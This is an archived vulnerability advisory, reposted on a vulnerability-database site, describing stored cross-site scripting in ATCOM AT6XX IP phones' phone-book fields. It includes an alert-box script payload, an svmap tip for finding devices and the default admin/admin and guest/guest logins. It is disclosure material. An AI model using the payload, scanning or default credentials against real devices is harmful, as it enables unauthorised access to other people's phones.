Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

IP phone AT6XX Cross Site Scripting Vulnerability

🗓️ 27 May 2012 00:00:00Reported by chekiType 
zdt
 zdt🔗 0day.today👁 523 Views

IP phone AT6XX Cross Site Scripting Vulnerability in ATCO

Code
==================================
IP phone AT6XX Cross Site Scripting
==================================

=======================================================
# Exploit Title: [IP phone AT6XX Cross Site Scripting ]
# Date: 27/05/2012
# Author: cheki
# Vendor: http://www.atcom.cn/
# Version: AT6XX models
# Category:: webapps
# Tested on: linux
# Contact: [email protected]
======================================================

=====================================================
                  # Vulnerabilities #

Go to System Manage>Phone Book and Add Phone Book and insert [Label==>Name && Label==>Namber]  

"<script>alert("XSS");</script>" and click Add. 

now you will get Cross Site Scripting error.

HTTP/1.1 200 OK
Server: Rapid Logic/1.1
MIME-version: 1.0
Date: Thu Jan  1 10:21:44 1970 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Set-Cookie: auth=6dea7758000091b8; path=/

# use:  svmap and scan ip or a range 

| SIP Device          | User Agent | Fingerprint |
--------------------------------------------------
| 192.169.0.3:5060 | unknown    | disabled    |


# demo: Remember the account is admin/admin
for administrator and guest/guest for user.


=====================================================

=====================================================
About ATCOM

ATCOM is the leading VoIP hardware manufacturer in global market. We have been keeping innovating with customer’s needs oriented , working with partners to establish a total solution for SMB VoIP with IP phone , IP PBX and Asterisk cards

With over 10 years’ experience of R&D , manufacturing and service in network and VoIP filed ; mission of creating the biggest value for IP terminals , we commit ourselves in supplying the competitive IP phone and other terminals for IP PBX , softswitch , IMS , NGN providers and carriers; supplying the competitive total VoIP solution for SMB market. We keep improving the customer’s experience and creating the bigger value with our reliable products. Until now , our VoIP products has been sold to over 60 countries and used by millions of end users.

For the R&D , we keep on investing the capital , partner with best technology companies all over the world. We have our own software Intellectual property rights and over 20 patents. We are devoted to provide better products and service for our customer with mission of becoming the best VoIP terminal manufacturer and principle of innovative hard working.
=====================================================

[-] Greetz to 1337day.com Team hacking.ge Team and Anuka bolqvadze



#  0day.today [2018-02-20]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 May 2012 00:00Current
7.1High risk
Vulners AI Score7.1
vulnerabilitycross site scriptingatcomip phonevoip hardware manufacturerwebappslinuxsip devicerapid logicsecurityxssip pbxasterisk cardssmb voipr&dvoip solutionvoip terminal manufacturer.
523